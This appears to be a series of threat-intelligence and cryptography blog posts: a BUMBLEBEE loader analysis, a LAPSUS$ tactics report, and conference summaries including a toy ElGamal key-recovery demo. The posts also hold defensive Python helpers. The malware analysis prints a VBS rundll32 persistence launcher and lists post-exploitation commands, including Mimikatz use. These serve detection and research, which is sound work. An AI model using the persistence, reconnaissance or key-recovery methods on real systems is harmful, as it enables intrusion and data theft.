client_id An MD5 hash of a UUID value obtained by executing the WMI query ‘SELECT * FROM Win32_ComputerSystemProduct’.
group_name A hardcoded value, which represents the group that the bot (compromised host) will be added to.
sys_version Windows OS version
client_version Default value that’s set to 1
user_name Username of the current user
domain_name Domain name taken by executing the WMI command ‘SELECT * FROM Win32_ComputerSystem’.
task_state Set to 0 by default. Used only when the network commands ‘ins’ or ‘sdl’ are executed.
task_id Set to 0 by default. Used only when the network commands ‘ins’ or ‘sdl’ are executed.
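The check-in record in the table above can be mocked up for building parsers or test fixtures. This is a sketch under stated assumptions: the UUID string encoding, the use of a hex digest, and the JSON value types (integers versus strings) are guesses for illustration, and `build_checkin` is a hypothetical helper name, not something taken from the binary.

```python
import hashlib
import json


def build_checkin(uuid, group_name, sys_version, user_name, domain_name):
    """Assemble a check-in record with the keys listed in the table above."""
    record = {
        # Assumption: MD5 over the UTF-8 UUID string, rendered as hex.
        "client_id": hashlib.md5(uuid.encode("utf-8")).hexdigest(),
        "group_name": group_name,
        "sys_version": sys_version,
        "client_version": 1,   # default value per the table
        "user_name": user_name,
        "domain_name": domain_name,
        "task_state": 0,       # only used for the 'ins' and 'sdl' commands
        "task_id": 0,          # only used for the 'ins' and 'sdl' commands
    }
    return json.dumps(record)


# All values below are made-up fixture data.
example = build_checkin(
    uuid="00000000-0000-0000-0000-000000000000",
    group_name="2004r",
    sys_version="Windows 10",
    user_name="analyst",
    domain_name="WORKGROUP",
)
```

The resulting string would then be RC4-encrypted before being sent, as described above.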

Once the server receives the request, it replies with the following data in a JSON format:

Key Description
response_status Boolean value, which shows if the server correctly parsed the loader’s request. Set to 1 if successful.
tasks Array containing all the tasks
task Task name
task_id ID of the received task, which is set by the operator(s).
task_data Data for the loader to execute in Base64 encoded format
file_entry_point Potentially represents an offset value. We have not observed this being used either in the binary’s code or during network communication (set to an empty string).

Tasks

Based on the tasks returned from the command-and-control servers, BUMBLEBEE will execute one of the tasks described below. For two of the tasks, shi and dij, BUMBLEBEE uses a list of predefined process image paths:

  • C:\Program Files\Windows Photo Viewer\ImagingDevices.exe
  • C:\Program Files\Windows Mail\wab.exe
  • C:\Program Files\Windows Mail\wabmig.exe

Task name Description
shi Injects the task’s data into a new process. The process image paths are embedded in the binary and one is selected at random.
dij Injects the task’s data into a new process. The injection method differs from the method used in task ‘shi’. The process image paths are embedded in the binary and one is selected at random.
dex Writes the task’s data into a file named ‘wab.exe’ in the Windows AppData folder.
sdl Deletes loader’s binary from disk.
ins Adds persistence to the compromised host.
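When triaging a decrypted server response, it can help to summarise each task before touching the payload. The sketch below assumes that `task`, `task_id`, `task_data` and `file_entry_point` are fields of each element of the `tasks` array (the nesting is inferred from the table, not confirmed), and the `MZ` check is just a common heuristic for spotting PE files. `summarise_tasks` is a hypothetical helper.

```python
import base64
import json

# Task names and meanings as listed in the table above.
KNOWN_TASKS = {
    "shi": "inject task data into a new process",
    "dij": "inject task data into a new process (different injection method)",
    "dex": "write task data to 'wab.exe' in the AppData folder",
    "sdl": "delete the loader binary from disk",
    "ins": "add persistence",
}


def summarise_tasks(response_json):
    """Decode each task's Base64 payload and describe it without executing anything."""
    response = json.loads(response_json)
    summaries = []
    for entry in response.get("tasks", []):
        payload = base64.b64decode(entry.get("task_data") or "")
        summaries.append({
            "task": entry.get("task"),
            "task_id": entry.get("task_id"),
            "meaning": KNOWN_TASKS.get(entry.get("task"), "unknown task"),
            "size": len(payload),
            "looks_like_pe": payload[:2] == b"MZ",
        })
    return summaries


# Made-up response used purely as a fixture.
sample = json.dumps({
    "response_status": 1,
    "tasks": [{
        "task": "dex",
        "task_id": 7,
        "task_data": base64.b64encode(b"MZ\x90\x00").decode("ascii"),
        "file_entry_point": "",
    }],
})
summaries = summarise_tasks(sample)
```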

For the persistence mechanism, BUMBLEBEE creates a new directory in the Windows AppData folder, with the directory’s name derived from the client_id MD5 value. Next, BUMBLEBEE copies itself to the new directory and creates a new VBS file with the following content:

Set objShell = CreateObject("Wscript.Shell")

objShell.Run "rundll32.exe my_application_path, IternalJob"

Lastly, it creates a scheduled task that has the following metadata (this can differ from sample to sample):

  1. Task name – Randomly generated. Up to 7 characters.
  2. Author – Asus
  3. Description – Video monitor
  4. Hidden from the UI – True
  5. Path – %WINDIR%\System32\wscript.exe VBS_Filepath

As with the directory name, the filenames of the new loader binary and the VBS file are also derived from the ‘client_id’ MD5 value.
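The scheduled-task metadata above lends itself to a simple hunting heuristic. The sketch below operates on a dictionary that a defender would populate from their own scheduled-task inventory; the field names (`name`, `author`, `description`, `hidden`, `action`) are hypothetical, and because the metadata can differ from sample to sample, a match is a lead to investigate rather than a verdict.

```python
def matches_bumblebee_task(task):
    """Return True if a scheduled-task record matches the metadata described above."""
    action = task.get("action", "").lower()
    return (
        len(task.get("name", "")) <= 7            # random name, up to 7 characters
        and task.get("author") == "Asus"
        and task.get("description") == "Video monitor"
        and task.get("hidden") is True
        and "wscript.exe" in action                # VBS launcher run via wscript
    )


# Made-up records used purely as fixtures.
suspicious = {
    "name": "qkzpwra",
    "author": "Asus",
    "description": "Video monitor",
    "hidden": True,
    "action": r"C:\Windows\System32\wscript.exe C:\Users\u\AppData\Roaming\abc\def.vbs",
}
benign = {
    "name": "GoogleUpdateTaskMachineCore",
    "author": "Google",
    "description": "Keeps software up to date",
    "hidden": False,
    "action": r"C:\Program Files\Google\Update\GoogleUpdate.exe /c",
}
```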

Additional Observations

This sub-section contains notes collected during the analysis phase that are worth mentioning.

  • The first iterations of BUMBLEBEE were observed in September 2021 and used “/get_load” as the URI. Later samples started using “/gate”. On 19 April, they switched to “/gates”, replacing the previous URI.
  • The “/get_load” endpoint is still active on the recent infrastructure – this is probably either for backwards compatibility or ignored by the operator(s). In addition, most of the earlier samples using this URI endpoint were uploaded from non-European countries.
  • Although BUMBLEBEE is under active development, the operator(s) have not implemented a command to update the loader’s binary, resulting in the loss of existing infections.
  • It was found via server errors (during network requests and from external parties) that the backend is written in Golang.
  • As mentioned above, every BUMBLEBEE binary has an embedded group tag. Currently, we have observed the following group tags:
VPS1GROUP ALLdll
VPS2GROUP 1804RA
VS2G 1904r
VPS1 2004r
SP1 1904l
RA1104 25html
LEG0704 2504r
AL1204 2704r
RAI1204  
  • As additional payloads, NCC Group’s RIFT has observed mostly Cobalt Strike and Meterpreter being sent as tasks. However, third parties have confirmed the drop of Sliver and Bokbot payloads.
  • During analysis, NCC Group’s RIFT observed a case where the command-and-control server sent the same Meterpreter PE file in two different tasks in the same request. This is probably an attempt to ensure execution of the downloaded payload (Figure 1). There were also cases where the server initially replied with a Cobalt Strike beacon and then followed up with two or more additional payloads, all of them Meterpreter.
Figure 1 – Duplicated received tasks
  • In one case, the downloaded Cobalt Strike beacon was executed in a sandbox environment and revealed the following commands were executed by the operator(s):
    • net group "domain admins" /domain
    • ipconfig /all
    • netstat -anop tcp
    • execution of Mimikatz

Indicators of Compromise

Type Description Value
IPv4 Meterpreter command-and-control server, linked to Group ID 2004r & 25html 23.108.57[.]13
IPv4 Meterpreter command-and-control server, linked to Group ID 2004r & 2504r 130.0.236[.]214
IPv4 Cobalt Strike server, linked to Group ID 1904r 93.95.229[.]160
IPv4 Cobalt Strike server, linked to Group ID 2004r 141.98.80[.]175
IPv4 Cobalt Strike server, linked to Group ID 2504r & 2704r 185.106.123[.]74
IPv4 BUMBLEBEE command-and-control servers 103.175.16[.]45 103.175.16[.]46 104.168.236[.]99 108.62.118[.]236 108.62.118[.]56 108.62.118[.]61 108.62.118[.]62 108.62.12[.]12 116.202.251[.]3 138.201.190[.]52 142.234.157[.]93 142.91.3[.]109 142.91.3[.]11 149.255.35[.]167 154.56.0[.]214 154.56.0[.]216 168.119.62[.]39 172.241.27[.]146 172.241.29[.]169 185.156.172[.]62 192.236.198[.]63 193.29.104[.]176 199.195.254[.]17 199.80.55[.]44 209.141.59[.]96 209.151.144[.]223 213.227.154[.]158 213.232.235[.]105 23.106.160[.]120 23.106.160[.]39 23.227.198[.]217 23.254.202[.]59 23.81.246[.]187 23.82.140[.]133 23.82.141[.]184 23.82.19[.]208 23.83.133[.]1 23.83.133[.]182 23.83.133[.]216 23.83.134[.]110 23.83.134[.]136 28.11.143[.]222 37.72.174[.]9 45.11.19[.]224 45.140.146[.]244 45.140.146[.]30 45.147.229[.]177 45.147.229[.]23 45.147.231[.]107 49.12.241[.]35 71.1.188[.]122 79.110.52[.]191 85.239.53[.]25 89.222.221[.]14 89.44.9[.]135 89.44.9[.]235 91.213.8[.]23 91.90.121[.]73
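The indicators above are defanged (`[.]`) so that they cannot be clicked or resolved by accident. Before loading them into a blocklist or SIEM lookup they need to be refanged and validated; a minimal sketch using only the standard library follows. `refang` and `parse_ipv4_iocs` are hypothetical helper names.

```python
import ipaddress


def refang(indicator):
    """Undo the common defanging conventions used in the tables above."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def parse_ipv4_iocs(cell):
    """Split a whitespace-separated table cell into validated IPv4 addresses."""
    # ipaddress.IPv4Address raises ValueError on anything malformed,
    # which catches copy/paste damage early.
    return [ipaddress.IPv4Address(refang(token)) for token in cell.split()]


addresses = parse_ipv4_iocs("23.108.57[.]13 130.0.236[.]214 93.95.229[.]160")
```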

References

[1] – https://github.com/LordNoteworthy/al-khaser

[2] – https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

LAPSUS$: Recent techniques, tactics and procedures

Authored by: David Brown, Michael Matthews and Rob Smallridge

tl;dr

This post describes the techniques, tactics and procedures we observed during recent LAPSUS$ incidents.

Our findings can be summarised as below:

  • Access and scraping of corporate Microsoft SharePoint sites in order to identify any credentials which may be stored in technical documentation.
  • Access to local password managers and databases to obtain further credentials and escalate privileges.
  • Living off the land – tools such as RVTools to shut down servers and ADExplorer to perform reconnaissance.
  • Cloning of git repositories and extraction of sensitive API Keys.
  • Using compromised credentials to access corporate VPNs.
  • Disruption or destruction of victim infrastructure to hinder analysis and consume defensive resources.

Summary

LAPSUS$ first appeared publicly in December 2021; however, NCC Group first observed LAPSUS$ months earlier during an incident response engagement. We believe the group also operated prior to this date, though perhaps not under the “LAPSUS$” banner.

Over the last 5 months, LAPSUS$ has gained considerable notoriety through successful breaches of large enterprises including Microsoft, Nvidia, Okta and Samsung. Little is still known about this group, whose motivations appear to be reputation, money and “for the lulz”.

LAPSUS$ commonly announce victims and claim responsibility via their Telegram channel, and in one case a victim’s DNS records were reconfigured to point to LAPSUS$-controlled domains/websites. However, not all victims or breaches appear to be actively announced via the Telegram channel, nor are all victims approached with a ransom demand. This distinguishes LAPSUS$ from more traditional ransomware groups, which have a clear modus operandi and are clearly financially focused. As a result, LAPSUS$ are less predictable, which may be why they have seen recent success.

This serves as a reminder to defenders of the need for defence in depth and the need to anticipate the different tactics that threat actors may use.

It is also worth mentioning the brazen behaviour of this threat actor and their emboldened attempts at Social Engineering by offering payment for insiders to provide valid credentials.

This tactic is potentially in response to greater home working due to the pandemic which means there is a far larger proportion of employees with VPN access and as such a greater pool of potential employees willing to sell their credentials.

To combat this, organisations need to ensure they have extensive VPN logging capabilities, robust helpdesk ticketing as well as methods to help identify anomalies in VPN access.
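One simple form of VPN anomaly detection is to flag a login from a country that a user has never connected from before. The sketch below assumes VPN logs have already been parsed into dictionaries with hypothetical `timestamp`, `user` and `country` fields (ISO 8601 timestamps, so string order is chronological order); real deployments would add further signals such as device, time of day or impossible travel.

```python
from collections import defaultdict


def flag_new_locations(events):
    """Return logins from a country not previously seen for that user."""
    seen = defaultdict(set)
    flagged = []
    for event in sorted(events, key=lambda e: e["timestamp"]):
        user, country = event["user"], event["country"]
        # The very first login only establishes a baseline and is not flagged.
        if seen[user] and country not in seen[user]:
            flagged.append(event)
        seen[user].add(country)
    return flagged


# Made-up log entries used purely as fixtures.
log = [
    {"timestamp": "2022-03-01T09:00:00Z", "user": "alice", "country": "GB"},
    {"timestamp": "2022-03-02T09:05:00Z", "user": "alice", "country": "GB"},
    {"timestamp": "2022-03-02T23:40:00Z", "user": "alice", "country": "BR"},
    {"timestamp": "2022-03-03T08:00:00Z", "user": "bob", "country": "NL"},
]
alerts = flag_new_locations(log)
```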

It is notable that the majority of LAPSUS$ actions exploit the human element as opposed to technical deficiencies or vulnerabilities. Although potentially viewed as unsophisticated or basic these techniques have been successful, so it is vital that organisations factor in controls and mitigations to address them.

Initial access

Threat Intelligence shows that LAPSUS$ utilise multiple methods to gain initial access.

The main source of initial access is believed to be stolen authentication cookies, which grant the attacker access to a specific application. These cookies are usually for Single sign-on (SSO) applications, which allow the attacker to pivot into other corporate applications, ultimately bypassing controls such as multi-factor authentication (MFA).

Credential access and Privilege escalation

Credential harvesting and privilege escalation are key components of the LAPSUS$ breaches we have seen. Escalation is rapid: the LAPSUS$ group have been seen to elevate from a standard user account to an administrative user within a couple of days.

In the investigations conducted by NCC Group, little to no malware is used. In one case NCC Group observed LAPSUS$ using nothing more than the legitimate Sysinternals tool ADExplorer, which was used to conduct reconnaissance on the victim’s environment.

Access to corporate VPNs is a primary focus for this group as it allows the threat actor to directly access key infrastructure which they require to complete their objectives.

In our incident response cases, we saw the threat actor leveraging compromised employee email accounts to email helpdesk systems requesting access credentials or support to get access to the corporate VPN.

Lateral Movement

In one incident, LAPSUS$ were observed to move sporadically through the victim environment via RDP in an attempt to access resources deeper in the environment. In some instances, threat-actor-controlled hostnames were revealed, including the host “VULTR-GUEST”, which refers to infrastructure hosted on the cloud hosting service Vultr[3].

Exfiltration

LAPSUS$’s action on objectives appears to focus on exfiltration of sensitive information as well as destruction or disruption. In one particular incident, the threat actor was observed to use the free file drop service “filetransfer[.]io”.

Impact

NCC Group has observed disruption and destruction to client environments by LAPSUS$ such as shutting down virtual machines from within on-premises VMware ESXi infrastructure, to the extreme of mass deletion of virtual machines, storage, and configurations in cloud environments making it harder for the victim to recover and for the investigation team to conduct their analysis activities.

The reported data theft appears to be heavily focused on application source code or proprietary technical information, with internal source code management or repository servers being targeted. These git repositories can contain not only commercially sensitive intellectual property, but in some cases also API keys to sensitive applications, including administrative or cloud applications.

Recommendations

  • Ensure that Cloud computing environments have sufficient logging enabled.
  • Ensure that cloud administrative access is configured to prevent unauthorised access to resources and that API keys are granted no more permissions than they require.
  • Utilise MFA for user authentication on both cloud and remote access solutions to help reduce the risk of unauthorised access.
  • Ensure logging is in place to record MFA device enrolment.
  • Security controls such as Conditional Access can help restrict or prevent unauthorised access based on criteria such as geographical location.
  • Implement activities to detect and investigate anomalies in VPN access.
  • Ensure a system is in place to record all helpdesk queries.
  • Avoid using SMS as an MFA vector to avoid the risk of SIM swapping.
  • Secure source code environments to ensure that users can only access the relevant repositories.
  • Secret Scanning[1][2] on source code repositories should be conducted to ensure that sensitive API credentials are not stored in source code. GitHub and GitLab offer detection mechanisms for this.
  • Remote Desktop services or Gateways used as a primary or secondary remote access solution should be removed from any corporate environment in favour of alternative solutions such as secured VPNs, or other Remote Desktop applications which mitigate common attack techniques such as brute force or exploitation and can offer additional security controls such as MFA and Conditional Access.
  • Centralise logging including cloud applications (SIEM solution).
  • Offline or immutable backups of servers should be taken to ensure that in the event of a data disruption or destruction attack, services can be restored.
  • Reduce MFA token/session cookie validity times.
  • Ensure principle of least privilege for user accounts is being adhered to.
  • Social engineering awareness training for all staff.
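To illustrate what secret scanning looks for, the sketch below checks text for two widely recognised patterns: the `AKIA` prefix format of AWS access key IDs and PEM private key headers. It is a toy, not a replacement for the GitHub and GitLab features referenced above, which cover far more credential types; the pattern set and the `scan_text` helper are illustrative assumptions.

```python
import re

# Two illustrative patterns; production scanners ship hundreds.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"
    ),
}


def scan_text(text):
    """Return (line number, pattern name) for every suspected secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


# AKIAIOSFODNN7EXAMPLE is the placeholder key used in AWS documentation.
sample_config = 'region = "eu-west-1"\naws_key = "AKIAIOSFODNN7EXAMPLE"\n'
findings = scan_text(sample_config)
```

Running such a check as a pre-commit hook or CI step catches credentials before they reach a repository an attacker might later clone.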

Indicators of Compromise

Indicator Value Indicator Type Description
104.238.222[.]158 IP address Malicious Lapsus Network Address
108.61.173[.]214 IP address Malicious Lapsus Network Address
185.169.255[.]74 IP address Malicious Lapsus Network Address
VULTR-GUEST Hostname Threat Actor Controlled Host
hxxps://filetransfer[.]io Domain Free File Drop Service Utilised by the Threat Actor

MITRE ATT&CK

Technique Code Technique
T1482 Discovery – Domain Trust Discovery
T1018 Discovery – Remote System Discovery
T1069.002 Discovery – Permission Groups Discovery: Domain Groups
T1016.001 Discovery – System Network Configuration Discovery: Internet Connection Discovery
T1078.002 Privilege Escalation – Valid Accounts: Domain Accounts
T1555.005 Credential Access – Credentials from Password Stores: Password Managers
T1021.001 Lateral Movement – Remote Services: Remote Desktop Protocol
T1534 Lateral Movement – Internal Spearphishing
T1072 Execution – Software Deployment Tools
T1213.002 Collection – Data from Information Repositories: Sharepoint
T1039 Collection – Data from Network Shared Drive
T1213.003 Collection – Data from Information Repositories: Code Repositories
T1567 Exfiltration – Exfiltration Over Web Service
T1485 Impact – Data Destruction
T1529 Impact – System Shutdown/Reboot

References

  1. https://docs.github.com/en/code-security/secret-scanning/about-secret-scanning
  2. https://docs.gitlab.com/ee/user/application_security/secret_detection
  3. https://www.vultr.com/

Real World Cryptography Conference 2022

26 April 2022 at 13:00

The IACR’s annual Real World Cryptography (RWC) conference took place in Amsterdam a few weeks ago. It remains the best venue for highlights of cryptographic constructions and attacks for the real world. While the conference was fully remote last year, this year it was a 3-day hybrid event, live-streamed from a conference center in charming central Amsterdam with an audience of about 500 cryptographers.

Some members of our Cryptography Services team attended in person, while others shifted their schedules by six hours to watch the talks live online. In this post, we share summaries of some of our favorite talks. Have a stroopwafel and enjoy!

An Evaluation of the Risks of Client-Side Scanning

On the second day of the conference, Matthew Green presented an extremely interesting talk based on a paper that was co-authored with Vanessa Teague, Bruce Schneier, Alex Stamos and Carmela Troncoso. He began by noting that the continued deployment of end-to-end encryption (and backup) over the past few years has only increased the concerns of the law enforcement community regarding content access. At the same time, technical opinions seem to be converging on the unsuitability of key escrow solutions for these purposes. Thus, as content transport becomes encrypted and goes dark, this naturally motivates an interest in client-side scanning technologies.

Until recently, law enforcement access requests primarily involved singular and exceptional circumstances, perhaps requiring subpoenas or other safeguards. Some may recall the FBI demanding access to domestic terrorism suspect’s phones.

However, law enforcement’s access requests underwent a significant expansion in October 2019, as can be seen in US Attorney General William Barr’s (and others) open letter to Mark Zuckerberg of Facebook. The letter noted the benefits of current safety systems operating on ALL (not singular) content and how end-to-end encryption will effectively shut them down, while requesting Facebook not proceed with its plans to deploy encrypted messaging until solutions can be developed to provide lawful access. The supporting narrative has also expanded from domestic terrorism, as the letter now highlights “…illegal content and activity, such as child sexual exploitation and abuse, terrorism, and foreign adversaries’ attempts to undermine democratic values and institutions…”. Given the benefit of perfect hindsight, the word “foreign” may have been unnecessary!

As it stands today, sent messages are generally scanned on a central server to detect suspect content by either A) a media hashing algorithm, or B) a neural network. While each approach has a variety of strengths and weaknesses, both involve proprietary and sensitive internal mechanisms that operate on unencrypted source material. The migration of this technology onto client devices is not straightforward.

One cryptographic innovation is to use two-party computation (2PC) where the client has the content, the server provides the scanning algorithm, and neither learns anything about the other unless there is a match. An example of this was published in August 2021 as the Apple PSI System. Nonetheless, Matthew Green highlighted a number of remaining risks.

Risk 1 is from mission creep. While current proposals center around child sexual abuse material (CSAM), the Barr memo clearly hints at the slippery slope leading to other content areas. In fact, the BBC reported on a similar scenario involving shifting commitments in “Singapore reveals Covid privacy data available to police”.

Risk 2 is from unauthorized surveillance. In this scenario, systems may be unable to detect if/when malicious actors inject unauthorized content into the scanning database or algorithm. There is disagreement on whether this can be reliably audited to prevent misuse or abuse.

Risk 3 is from malicious false positives. All systems produce false positives where a harmless image may trigger a detection (e.g., hash collision) event. Attempts to limit this by keeping algorithm/models/data secret are unrealistic as demonstrated by the rapid reverse engineering of Apple’s NeuralHash function as noted by Bruce Schneier.

In any event, Apple announced an indefinite delay to its deployment plans in September 2021. However, as enormous pressure remains on providing content access to law enforcement, the idea will not simply go away. As these client-side scanning technologies may represent the most powerful surveillance system ever imagined, it is imperative that we find a way to make them auditable and abuse-resistant prior to deployment.

If you are interested in finding out more, see the paper “Bugs in our Pockets: The Risks of Client-Side Scanning” at https://arxiv.org/abs/2110.07450.

— Eric Schorn

On the (in)security of ElGamal in OpenPGP

🏴‍☠️ Ahoy, everyone! 🏴‍☠️

Cryptography’s most notorious pirate 🦜, Luca De Feo, returns to Real World Crypto to discuss the dangers of ambiguity in cryptographic standards, based on his work with Bertram Poettering and Alessandro Sorniotti. In particular, the focus of the presentation (YouTube, slides) is on how flexibility in a key generation standard can result in practical plaintext recovery.

The story begins with the OpenPGP Message Format RFC 4880, which states:

Implementations MUST implement DSA for signatures, and ElGamal for encryption. Implementations SHOULD implement RSA […]

Although RSA is usually the standard choice, any implementation that follows the RFC comes packaged with the option to instead use ElGamal (over a finite field, not an elliptic curve), and this is where the problem lies.

Unlike RSA, ECDH, or (EC)DSA, ElGamal doesn’t have a fixed standard. Instead, the protocol is usually implemented from either the original paper, or The Handbook of Applied Cryptography (Chapter 8).

ElGamal Encryption

ElGamal encryption is simple enough that we can describe it here. A public key contains a prime modulus p, a generator \alpha of a cyclic group and the public value X = \alpha^x \pmod p. The secret key is the integer x. To encrypt a message m, an ephemeral key y is randomly chosen and the ciphertext is the tuple
\displaystyle (Y = \alpha^y, \; \; X^y \cdot m) \pmod p.
To decrypt a message, usually one computes Y^x using knowledge of the secret key and then the message from
\displaystyle \frac{X^y \cdot m}{Y^x} = \frac{(\alpha^{x})^y \cdot m}{(\alpha^y)^x} = m \pmod p.
However, if an attacker can compute y directly, then the message can be recovered by computing X^y and dividing
\displaystyle \frac{X^y \cdot m}{X^y} = m \pmod p.
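The equations above can be checked with a toy implementation. The parameters are deliberately tiny and insecure: p = 2039 and \alpha = 7 are values assumed here for illustration only, and the function names are hypothetical. The sketch shows both normal decryption with the secret key x and recovery of m by anyone who learns the ephemeral key y.

```python
import secrets

P = 2039      # toy prime modulus (2 * 1019 + 1), far too small for real use
ALPHA = 7     # toy base, assumed for illustration


def keygen():
    """Return (secret key x, public value X = ALPHA^x mod P)."""
    x = secrets.randbelow(P - 2) + 1
    return x, pow(ALPHA, x, P)


def encrypt(X, m):
    """Return the ciphertext (Y, X^y * m) and, for the demo only, the ephemeral y."""
    y = secrets.randbelow(P - 2) + 1
    return (pow(ALPHA, y, P), pow(X, y, P) * m % P), y


def decrypt(x, ciphertext):
    """Legitimate decryption: divide by Y^x using the secret key."""
    Y, c = ciphertext
    return c * pow(pow(Y, x, P), -1, P) % P


def recover_with_ephemeral(X, y, ciphertext):
    """Attacker's view: knowing y, divide by X^y without ever learning x."""
    _, c = ciphertext
    return c * pow(pow(X, y, P), -1, P) % P


x, X = keygen()
message = 1234
ciphertext, y = encrypt(X, message)
```

Both `decrypt(x, ciphertext)` and `recover_with_ephemeral(X, y, ciphertext)` return the original message, which is why protecting the ephemeral key matters as much as protecting the secret key. The three-argument `pow` with exponent -1 requires Python 3.8 or later.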

Parameter generation

The attack described below comes from interoperability of differing implementations that disagree on the assumptions made on the parameters of ElGamal encryption.

Let’s first look at how the primes can be chosen. We write our primes in the form p = 2qf + 1, with q prime. When f=1, we name the primes “safe primes”, which account for 70% of the primes found during the survey. Lim-Lee primes are those for which q and the prime factors of f = \ell_0 \ell_1 \ldots \ell_k are all large and approximately the same size. If we allow f to have arbitrary factorization, then the primes p are known as Schnorr primes.

Next up is how the generators \alpha and keys x,y can be chosen. Generally, implementations pick a primitive \alpha which generates all of the group (\mathbb{Z} / p \mathbb{Z})^\times. In these cases, the secret and ephemeral keys should be picked in the range x,y \in [1,p-1].

However, certain specifications assume that the prime p is a safe or Lim-Lee prime. In these cases, the generator \alpha instead generates a subgroup of order q and the secret and ephemeral keys can be picked to be “short”. This has the benefit of allowing encryption to be efficient, as the exponents x,y are much smaller than p.

Cross Configuration Attacks

In isolation, either of the above set-ups can be used safely. However, a vulnerability can occur when two distinct implementations interoperate under different assumptions. The attack arises when a public key that uses a Schnorr prime with a primitive generator is sent to an implementation that produces short ephemeral keys.

Precisely, if an attacker can find the factors of f = \ell_0 \ell_1 \ldots \ell_k, the ephemeral key can be computed directly by solving the discrete log problem from Y in each subgroup whose prime order \ell_i is small enough. Then, from each piece y_i = y \pmod {\ell_i} computed, the entire key y can be recovered using the Chinese remainder theorem, provided that the product of the small factors is greater than the short key: y < \prod_{i=0}^n \ell_i for some n \leq k.
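The recovery of a short ephemeral key can be demonstrated end to end on toy parameters. The sketch below searches for a small prime of the form p = 2qf + 1 with a smooth f, finds a primitive generator, and then recovers y from Y alone by brute-forcing each small subgroup and combining the residues with the Chinese remainder theorem. All sizes, the choice of small factors, and the function names are assumptions for illustration; the real attack uses far more efficient discrete log algorithms on far larger numbers.

```python
from math import prod


def is_prime(n):
    """Trial division; adequate for the toy sizes used here."""
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True


def toy_schnorr_prime(small_factors, q_start):
    """Find p = 2*q*f + 1 with q prime and f the product of small_factors."""
    f = prod(small_factors)
    q = q_start
    while not (is_prime(q) and is_prime(2 * q * f + 1)):
        q += 1
    return 2 * q * f + 1, q


def primitive_root(p, prime_factors):
    """Smallest generator of the whole group, given the prime factors of p - 1."""
    for a in range(2, p):
        if all(pow(a, (p - 1) // r, p) != 1 for r in prime_factors):
            return a
    raise ValueError("no primitive root found")


def crt(residues, moduli):
    """Combine residues modulo pairwise coprime moduli."""
    M = prod(moduli)
    total = 0
    for r, m in zip(residues, moduli):
        Mi = M // m
        total += r * Mi * pow(Mi, -1, m)
    return total % M


def recover_short_exponent(Y, alpha, p, small_factors):
    """Recover y from Y = alpha^y mod p, assuming y < prod(small_factors)."""
    residues = []
    for ell in small_factors:
        g = pow(alpha, (p - 1) // ell, p)   # element of order ell
        h = pow(Y, (p - 1) // ell, p)       # equals g^(y mod ell)
        residues.append(next(e for e in range(ell) if pow(g, e, p) == h))
    return crt(residues, small_factors)


SMALL = [3, 5, 7, 11, 13]                   # prime factors of f; product is 15015
p, q = toy_schnorr_prime(SMALL, q_start=1009)
alpha = primitive_root(p, [2, q] + SMALL)

y = 12345                                   # "short" ephemeral key, below 15015
Y = pow(alpha, y, p)
recovered = recover_short_exponent(Y, alpha, p, SMALL)
```

The attacker never touches the large factor q: because y is smaller than the product of the small factors, the residues modulo those factors already determine it completely.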

Of the 800,000 ElGamal PGP public keys surveyed, 2,000 keys were exposed to practical plaintext recovery via computing the ephemeral keys when messages were encrypted using GnuPG, Botan, Libcrypto++ or any other library implementing the short key optimization.

Side-Channels

Additionally, some ephemeral keys were leaked by side channel attacks. Generally, FLUSH+RELOAD (instruction cache) or PRIME+PROBE (data cache) were used to leak data, but additional discrete logarithms must be computed to fully recover the ephemeral keys.

In the Libcrypto++ and Go implementations, the side-channel attacks are said to be straightforward, but for GnuPG, the attacks are much harder. If the short keys are generated by GnuPG, key recovery is estimated to be within reach for nation state attackers, but for Libcrypto++, as the keys are even shorter, a lucky attacker may be able to recover the key on commodity resources.

A summary of the work, including a live demo, is available on IBM’s site, and the paper itself is available on eprint.

— Giacomo Pope

“They’re not that hard to mitigate”: What Cryptographic Library Developers Think About Timing Attacks

Ján Jančár presented a joint work with Marcel Fourné, Daniel De Almeida Braga, Mohamed Sabt, Peter Schwabe, Gilles Barthe, Pierre-Alain Fouque and Yasemin Acar. The corresponding paper has been made available on eprint. It is a survey paper that tries to investigate why timing attacks are still found in cryptographic libraries: are cryptographic library developers aware that they exist, do they try to mitigate them, do they know about existing tools and frameworks for detection and prevention of timing issues?

To answer such questions, the authors contacted 201 developers of 36 “prominent” cryptographic libraries and asked them to fill in a survey on the subject, with free-text answers. Unconstrained answers were chosen because the cryptographic libraries cover a very large spectrum of target systems, usage contexts, and optimization goals (performance, portability,…) that could not be properly captured with a multiple-choice questionnaire. The paper details the methodology used for interpretation of the results. The authors draw several conclusions from the analysis of the survey results, the main one being nicely summarized by the quote in the title of the talk: developers know and care about such timing issues, but think that they are not that hard to avoid, and thus do not prioritize investigating and using tools that could help in that area.
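For readers less familiar with the topic, the classic example of a timing leak is a comparison that stops at the first mismatching byte, so that its running time reveals how much of a secret value an attacker has guessed correctly. The sketch below contrasts such a comparison with the standard library’s `hmac.compare_digest`. It is illustrative only: Python is not a language in which cryptographic libraries of the kind surveyed are normally written, and `leaky_equal` is a hypothetical name.

```python
import hmac


def leaky_equal(a: bytes, b: bytes) -> bool:
    """Early-exit comparison: running time depends on the first differing byte."""
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False      # returns sooner the earlier the mismatch occurs
    return True


def constant_time_equal(a: bytes, b: bytes) -> bool:
    """Comparison designed not to leak the position of the first difference."""
    return hmac.compare_digest(a, b)


expected_tag = bytes.fromhex("00112233445566778899aabbccddeeff")
forged_tag = bytes.fromhex("00112233445566778899aabbccddee00")
```

Both functions return the same answers; the difference lies only in how long they take, which is exactly what makes such leaks easy to overlook in testing.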

